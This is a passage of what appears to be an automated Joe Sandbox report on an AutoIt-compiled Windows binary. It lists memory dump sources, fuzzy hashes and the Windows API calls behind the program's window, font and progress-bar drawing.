• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
• Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
• Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
• Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
• Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00472C51
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
• Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
• Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
• Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
• Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
• Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
• Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
Strings
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID:
• String ID: N@
• API String ID: 0-1509896676
• Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
• Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
• Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
• Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
• Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
• Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
• Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
• Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
• Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
• Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
• Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
• Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
• Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
• Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
• Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
• Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                    • Instruction ID: 9956b8ead60c746f4d185347b419096a9fc1ff656525fac9ff4b5bae9f71829b
                                                                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                    • Instruction Fuzzy Hash: 4C41D571D1051CDBCF48CFADC991AEEBBF1AF88201F548299D516AB345D730AB41DB40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                    • Instruction ID: e012074f8602b1a7080d2fd5849b02cbafd5bfb9fd1000267a6c5200d3a897f4
                                                                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                    • Instruction Fuzzy Hash: 0C018C78E10209EFCB44DF98C5909AEFBF5FB48250F608699E809A7341E730EE41DB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                    • Instruction ID: 210ddec57d69896d12179301e1920c9032f5b8e36c74c7b40363780feba995f6
                                                                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                    • Instruction Fuzzy Hash: CB017E79A10209EFCB44DF98C5909AEFBF5FB58210F608599D809A7341D730EE41DB80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2145500065.0000000004207000.00000040.00000020.00020000.00000000.sdmp, Offset: 04207000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_4207000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                    • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                    • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                    • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                    • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                    • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                                    • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                    • _wcslen.LIBCMT ref: 00459916
                                                                                                                    • _wcscpy.LIBCMT ref: 0045993A
                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                    • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                                    • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                    • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                    • API String ID: 4040870279-2373415609
                                                                                                                    • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                    • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                    • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                    • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                    APIs
                                                                                                                    • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                    • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                    • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                    • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                    • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                    • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                      • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                      • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                      • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                      • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                      • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                      • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                      • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                      • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 69173610-0
                                                                                                                    • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                    • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                    • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                    • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                    • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                    • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                    • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                    • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
